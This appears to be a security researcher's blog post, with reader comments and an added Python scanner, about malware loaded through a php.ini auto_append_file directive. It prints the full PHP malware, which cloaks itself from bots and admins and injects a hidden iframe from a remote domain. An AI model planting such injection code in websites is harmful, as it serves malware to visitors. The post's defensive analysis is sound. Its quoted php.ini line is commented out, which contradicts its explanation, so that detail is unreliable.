Malware Being Called From Your php.ini File

Is your site infected with malware, and you can't find it anywhere? It might be a good idea to search outside of your web directory and look in your main configuration files (especially if you are on a dedicated/VPS server).

We are seeing an increased number of infected sites with malicious iframes, similar to this one:

<style type="text/css">#doxig {width: 10px;height: 10px;frameborder: no;visibility: hidden;scrolling: no;}</style><iframe id="doxig" src="http://1306a95ajbr.liga4giurgiu.info/ad.jpg?2"></iframe>

These specific strings aren’t typically found anywhere in the website files, which is very concerning. We’re finding that entire servers are being compromised, and the main server php.ini file (/etc/php/php.ini) has the following setting added:

;auto_append_file = "0ff"

This single line in the php.ini makes PHP include the file 0ff (found at /tmp/0ff) after every PHP script it runs. So even if your files look clean, the malware is still served to anyone visiting the site.
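As an added example (not part of the original post, and not Sucuri's code), the scanner below reads a php.ini and reports any auto_append_file or auto_prepend_file directive. It distinguishes an active directive from one that is commented out, because in php.ini a leading ; disables the line, and it lists the locations PHP would search for a bare name such as 0ff, since those directives are loaded like require and therefore consult include_path. The sample ini fragment is constructed for the demonstration; the default include_path used when the file sets none is an assumption.

```python
import re
import sys

# Directives that make PHP include a file before/after every script.
# Legitimate servers rarely set them, so any active, non-empty value deserves a look.
WATCHED_RE = re.compile(
    r'^\s*(?P<off>;)?\s*(?P<key>auto_(?:prepend|append)_file)\s*=\s*(?P<val>.*?)\s*$',
    re.IGNORECASE,
)
INCLUDE_PATH_RE = re.compile(r'^\s*include_path\s*=\s*(?P<val>.*?)\s*$', re.IGNORECASE)

# Constructed php.ini fragment (not taken from any real server).
SAMPLE_INI = """\
; constructed php.ini fragment
include_path = ".:/usr/share/php:/tmp"
;auto_append_file = "0ff"
auto_append_file = "0ff"
auto_prepend_file =
"""


def _unquote(raw):
    """Strip surrounding quotes or a trailing ; comment from an ini value."""
    raw = raw.strip()
    if raw and raw[0] in '"\'':
        end = raw.find(raw[0], 1)
        return raw[1:end] if end != -1 else raw[1:]
    return raw.split(';', 1)[0].strip()


def scan_php_ini(text):
    """Return (active, commented, include_path) for the watched directives."""
    active, commented = [], []
    include_path = ".:/usr/share/php"  # assumed default when the ini sets none
    for lineno, line in enumerate(text.splitlines(), 1):
        m = INCLUDE_PATH_RE.match(line)
        if m:
            include_path = _unquote(m.group('val'))
            continue
        m = WATCHED_RE.match(line)
        if not m:
            continue
        entry = {'line': lineno, 'key': m.group('key').lower(), 'value': _unquote(m.group('val'))}
        (commented if m.group('off') else active).append(entry)
    return active, commented, include_path


def candidate_locations(value, include_path):
    """Paths PHP would try: an absolute path as-is, otherwise each include_path entry."""
    if not value:
        return []
    if value.startswith('/'):
        return [value]
    return [f"{d.rstrip('/')}/{value}" for d in include_path.split(':') if d]


def report(text):
    """Active, non-empty directives with the places the referenced file could live."""
    active, _commented, include_path = scan_php_ini(text)
    return [
        (e['line'], e['key'], e['value'], candidate_locations(e['value'], include_path))
        for e in active if e['value']
    ]


if __name__ == "__main__":
    # Pass one or more php.ini paths; with none, scan the constructed sample.
    sources = [(p, open(p, encoding='utf-8', errors='replace').read()) for p in sys.argv[1:]] \
        or [("<sample>", SAMPLE_INI)]
    for name, text in sources:
        for lineno, key, value, where in report(name and text):
            print(f"{name}:{lineno}: {key} = {value!r}; check {', '.join(where)}")
```

Run it against /etc/php/php.ini (or whatever php --ini reports as the loaded file) and against any per-directory .user.ini or .htaccess php_value lines, which can set the same directives. The effective value at runtime is visible with php -i, which is the check to make when the ini on disk looks clean.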

This is the code of the 0ff file:

<?php
// Fires once per visitor (it sets the fake PHPSESS1D cookie) and skips the listed
// search-engine bots, non-Windows platforms and Chrome, so admins and crawlers rarely see it.
if(!@isset($_COOKIE['PHPSESS1D']) &&
 !@preg_match('/; Yandex|; Googlebot|linux|macintosh|android|Symbian|iPhone|Mac OS|Opera Mini|Chrome|Apple/i',$_SERVER['HTTP_USER_AGENT'])) {
 // Mark the visitor so the iframe is only injected on the first page view.
 echo '<script type="text/javascript">
 d=new Date();
 d.setDate(d.getDate()+1);
 document.cookie="PHPSESS1D=1; path=/; expires=" + d.toGMTString();
 </script>';
 // The hidden 10x10 iframe that loads the remote payload.
 echo '<style type="text/css">#doxig {width: 10px;height: 10px;frameborder: no;visibility: hidden;scrolling: no;}</style><iframe id="doxig" src="http://1306a95ajbr.liga4giurgiu.info/ad.jpg?2"></iframe>';
}

So if you are seeing those hidden iframes and your site files look clean, check your php.ini and your main Apache configuration files.


About David Dede

David Dede is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

  • Shosha

    Yeah lol, a "vulnerability" that is a legitimate and documented directive of PHP... If you leave your php.ini unprotected, it's really your own fault, not PHP's...

  • Anonymous

    Anyway it's a bad idea; most distros around empty /tmp at boot by default. It will get deleted just by rebooting.

  • SomeGuy

    How is the php.ini being modified, are you finding this happening in setups with incorrect permissions, are they being uploaded, or is another vulnerability being exploited?
